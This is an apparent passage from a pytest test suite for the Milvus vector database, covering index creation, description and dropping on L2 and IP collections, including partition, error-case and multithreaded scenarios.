def test_create_index_partition_flush(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(collection, tag)
status, ids = connect.add_vectors(collection, vectors, partition_tag=tag)
connect.flush()
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, collection):
'''
target: test create index without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(collection, top_k, query_vecs, params=search_param)
assert status.OK()
assert len(result) == len(query_vecs)
logging.getLogger().info(result)
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_multithread(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
threads_num = 8
threads = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
t = threading.Thread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_multithread_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
threads_num = 8
loop_num = 8
threads = []
collection = []
j = 0
while j < (threads_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_collection(collection[ids*process_num+i])
status, ids = connect.add_vectors(collection[ids*threads_num+i], vectors)
status = connect.create_index(collection[ids*threads_num+i], IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection[ids*threads_num+i], top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
ids = i
t = threading.Thread(target=create_index, args=(m,ids))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def test_create_index_a_multithreads(self, connect, collection, args):
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
def count(connect):
status, count = connect.count_collection(collection)
assert status.OK()
assert count == nb
threads_num = 8
threads = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(threads_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
if(i % 2 == 0):
p = threading.Thread(target=build, args=(m,))
else:
p = threading.Thread(target=count, args=(m,))
threads.append(p)
p.start()
time.sleep(0.2)
for p in threads:
p.join()
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(collection, vectors)
def build(connect):
status = connect.create_index(collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_type': IndexType.FLAT,
'store_raw_vector': False}
connect.create_collection(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_collection(collection[ids*process_num+i])
status, ids = connect.add_vectors(collection[ids*process_num+i], vectors)
status = connect.create_index(collection[ids*process_num+i], IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection[ids*process_num+i], top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_collection_not_existed(self, connect):
'''
target: test create index interface when collection name not existed
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, create index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(collection_name, index_type, index_param)
assert not status.OK()
def test_create_index_collection_None(self, connect):
'''
target: test create index interface when collection name is None
method: create collection and add vectors in it, create index with an collection_name: None
expected: return code not equals to 0, create index failed
'''
collection_name = None
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = connect.create_index(collection_name, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status, ids = connect.add_vectors(collection, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(collection, index_type, index_param)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
assert result._params["nlist"] == nlist
assert result._collection_name == collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, collection, get_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_index["index_param"]
index_type = get_index["index_type"]
logging.getLogger().info(get_index)
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
if status.OK():
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of L2
method: create collections and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, collection):
'''
target: test describe index without connection
method: describe index, and check if describe successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(collection)
def test_describe_index_collection_not_existed(self, connect):
'''
target: test describe index interface when collection name not existed
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, describe index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status, result = connect.describe_index(collection_name)
assert not status.OK()
def test_describe_index_collection_None(self, connect):
'''
target: test describe index interface when collection name is None
method: create collection and add vectors in it, create index with an collection_name: None
expected: return code not equals to 0, describe index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.describe_index(collection_name)
def test_describe_index_not_create(self, connect, collection):
'''
target: test describe index interface when index not created
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, describe index failed
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
target: test drop index repeatly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, collection):
'''
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(collection)
def test_drop_index_collection_not_existed(self, connect):
'''
target: test drop index interface when collection name not existed
method: create collection and add vectors in it, create index
, make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
'''
collection_name = gen_unique_str(self.__class__.__name__)
status = connect.drop_index(collection_name)
assert not status.OK()
def test_drop_index_collection_None(self, connect):
'''
target: test drop index interface when collection name is None
method: create collection and add vectors in it, create index with an collection_name: None
expected: return code not equals to 0, drop index failed
'''
collection_name = None
with pytest.raises(Exception) as e:
status = connect.drop_index(collection_name)
def test_drop_index_collection_not_create(self, connect, collection):
'''
target: test drop index interface when index not created
method: create collection and add vectors in it, create index
expected: return code not equals to 0, drop index failed
'''
status, ids = connect.add_vectors(collection, vectors)
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(collection)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, collection, get_simple_index):
'''
target: test create / drop index repeatly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
def test_create_drop_index_repeatly_different_index_params(self, connect, collection):
'''
target: test create / drop index repeatly, use the different index params
method: create index, drop index, four times, each tme use different index_params to create index
expected: return code 0
'''
nlist = NLIST
indexs = [{"index_type": IndexType.IVFLAT, "index_param": {"nlist": nlist}}, {"index_type": IndexType.IVF_SQ8, "index_param": {"nlist": nlist}}]
# status, ids = connect.add_vectors(collection, vectors)
for i in range(2):
status = connect.create_index(collection, indexs[i]["index_type"], indexs[i]["index_param"])
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
status = connect.drop_index(collection)
assert status.OK()
status, result = connect.describe_index(collection)
logging.getLogger().info(result)
assert result._collection_name == collection
assert result._index_type == IndexType.FLAT
class TestIndexIP:
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in CPU mode")
if str(connect._cmd("mode")[1]) == "GPU":
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("ivfpq not support in GPU mode")
if request.param["index_type"] == IndexType.RNSG:
pytest.skip("rnsg not support in ip")
return request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.level(2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_collection(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface
method: create collection, create partition, and add vectors in it, create index on collection
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.level(2)
def test_create_index_without_connect(self, dis_connect, ip_collection):
'''
target: test create index without connection
method: create collection and add vectors in it, check if added successfully
expected: raise exception
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.create_index(ip_collection, index_type, index_param)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface, search with more query vectors
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
logging.getLogger().info(connect.describe_index(ip_collection))
query_vecs = [vectors[0], vectors[1], vectors[2]]
top_k = 5
search_param = get_search_param(index_type)
status, result = connect.search_vectors(ip_collection, top_k, query_vecs, params=search_param)
logging.getLogger().info(result)
assert status.OK()
assert len(result) == len(query_vecs)
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.level(2)
def _test_create_index_multiprocessing(self, connect, ip_collection, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
status, ids = connect.add_vectors(ip_collection, vectors)
def build(connect):
status = connect.create_index(ip_collection, IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
process_num = 8
processes = []
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
p = Process(target=build, args=(m,))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
# TODO: enable
@pytest.mark.timeout(BUILD_TIMEOUT)
def _test_create_index_multiprocessing_multicollection(self, connect, args):
'''
target: test create index interface with multiprocess
method: create collection and add vectors in it, create index
expected: return code equals to 0, and search success
'''
process_num = 8
loop_num = 8
processes = []
collection = []
j = 0
while j < (process_num*loop_num):
collection_name = gen_unique_str("test_create_index_multiprocessing")
collection.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim}
connect.create_collection(param)
j = j + 1
def create_index():
i = 0
while i < loop_num:
# assert connect.has_collection(collection[ids*process_num+i])
status, ids = connect.add_vectors(collection[ids*process_num+i], vectors)
status = connect.create_index(collection[ids*process_num+i], IndexType.IVFLAT, {"nlist": NLIST})
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(collection[ids*process_num+i], top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
assert result[0][0].distance == 0.0
i = i + 1
uri = "tcp://%s:%s" % (args["ip"], args["port"])
for i in range(process_num):
m = get_milvus(args["handler"])
m.connect(uri=uri)
ids = i
p = Process(target=create_index, args=(m,ids))
processes.append(p)
p.start()
time.sleep(0.2)
for p in processes:
p.join()
def test_create_index_no_vectors(self, connect, ip_collection):
'''
target: test create index interface when there is no vectors in collection
method: create collection and add no vectors in it, and then create index
expected: return code equals to 0
'''
nlist = NLIST
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_then_add_vectors(self, connect, ip_collection, get_simple_index):
'''
target: test create index interface when there is no vectors in collection, and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index, add vectors in it
expected: return code equals to 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_index(ip_collection, index_type, index_param)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type = IndexType.IVF_SQ8
index_param = {"nlist": nlist}
status = connect.create_index(ip_collection, index_type, index_param)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
query_vec = [vectors[0]]
top_k = 1
search_param = {"nprobe": nprobe}
status, result = connect.search_vectors(ip_collection, top_k, query_vec, params=search_param)
assert len(result) == 1
assert len(result[0]) == top_k
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, ip_collection):
'''
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
'''
nlist = NLIST
status, ids = connect.add_vectors(ip_collection, vectors)
index_type_1 = IndexType.IVF_SQ8
index_type_2 = IndexType.IVFLAT
indexs = [{"index_type": index_type_1, "index_param": {"nlist": nlist}}, {"index_type": index_type_2, "index_param": {"nlist": nlist}}]
logging.getLogger().info(indexs)
for index in indexs:
status = connect.create_index(ip_collection, index["index_type"], index["index_param"])
assert status.OK()
status, result = connect.describe_index(ip_collection)
assert result._params["nlist"] == nlist
assert result._collection_name == ip_collection
assert result._index_type == index_type_2
"""
******************************************************************
The following cases are used to test `describe_index` function
******************************************************************
"""
def test_describe_index(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
# status, ids = connect.add_vectors(ip_collection, vectors[:5000])
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
status, mode = connect._cmd("mode")
if str(mode) == "GPU" and index_type == IndexType.IVF_PQ:
assert result._index_type == IndexType.FLAT
assert result._params["nlist"] == NLIST
else:
assert result._index_type == index_type
assert result._params == index_param
def test_describe_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partition and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_index_partition_A(self, connect, ip_collection, get_simple_index):
'''
target: test describe index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call describe index
expected: return code 0, and index instructure
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=new_tag)
status = connect.create_index(ip_collection, index_type, index_param)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == ip_collection
assert result._index_type == index_type
def test_describe_and_drop_index_multi_collections(self, connect, get_simple_index):
'''
target: test create, describe and drop index interface with multiple collections of IP
method: create collections and add vectors in it, create index, call describe index
expected: return code 0, and index instructure
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(10):
collection_name = gen_unique_str()
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
logging.getLogger().info(get_simple_index)
status, ids = connect.add_vectors(collection_name=collection_name, records=vectors)
status = connect.create_index(collection_name, index_type, index_param)
assert status.OK()
for i in range(10):
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._params == index_param
assert result._collection_name == collection_list[i]
assert result._index_type == index_type
for i in range(10):
status = connect.drop_index(collection_list[i])
assert status.OK()
status, result = connect.describe_index(collection_list[i])
logging.getLogger().info(result)
assert result._collection_name == collection_list[i]
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_describe_index_without_connect(self, dis_connect, ip_collection):
'''
target: test describe index without connection
method: describe index, and check if describe successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.describe_index(ip_collection)
def test_describe_index_not_create(self, connect, ip_collection):
'''
target: test describe index interface when index not created
method: create collection and add vectors in it, create index
, make sure the collection name not in index
expected: return code not equals to 0, describe index failed
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert status.OK()
# assert result._params["nlist"] == index_params["nlist"]
# assert result._collection_name == collection
# assert result._index_type == index_params["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
def test_drop_index(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection and add vectors in it, create index, call drop index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partition and add vectors in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status, ids = connect.add_vectors(ip_collection, vectors, partition_tag=tag)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_partition_C(self, connect, ip_collection, get_simple_index):
'''
target: test drop index interface
method: create collection, create partitions and add vectors in it, create index on partitions, call drop partition index
expected: return code 0, and default index param
'''
new_tag = "new_tag"
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status = connect.create_partition(ip_collection, tag)
status = connect.create_partition(ip_collection, new_tag)
status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
def test_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
target: test drop index repeatly
method: create index, call drop index, and drop again
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
# status, ids = connect.add_vectors(ip_collection, vectors)
status, mode = connect._cmd("mode")
assert status.OK()
# status, ids = connect.add_vectors(ip_collection, vectors)
status = connect.create_index(ip_collection, index_type, index_param)
if str(mode) == "GPU" and (index_type == IndexType.IVF_PQ):
assert not status.OK()
else:
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
status = connect.drop_index(ip_collection)
assert status.OK()
status = connect.drop_index(ip_collection)
assert status.OK()
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
assert result._collection_name == ip_collection
assert result._index_type == IndexType.FLAT
@pytest.mark.level(2)
def test_drop_index_without_connect(self, dis_connect, ip_collection):
'''
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
'''
nlist = NLIST
index_type = IndexType.IVFLAT
index_param = {"nlist": nlist}
with pytest.raises(Exception) as e:
status = dis_connect.drop_index(ip_collection, index_type, index_param)
def test_drop_index_collection_not_create(self, connect, ip_collection):
'''
target: test drop index interface when index not created
method: create collection and add vectors in it, create index
expected: return code not equals to 0, drop index failed
'''
status, ids = connect.add_vectors(ip_collection, vectors)
status, result = connect.describe_index(ip_collection)
logging.getLogger().info(result)
# no create index
status = connect.drop_index(ip_collection)
logging.getLogger().info(status)
assert status.OK()
def test_create_drop_index_repeatly(self, connect, ip_collection, get_simple_index):
'''
target: test create / drop index repeatly, use the same index params
method: create index, drop index, four times
expected: return code 0
'''
index_param = get_simple_index["index_param"]
index_type = get_simple_index["index_type"]
status, ids = connect.add_vectors(ip_collection, vectors)
for i in range(2):
status = connect.create_index(ip_collection, index_type, index_param)
assert status.OK()
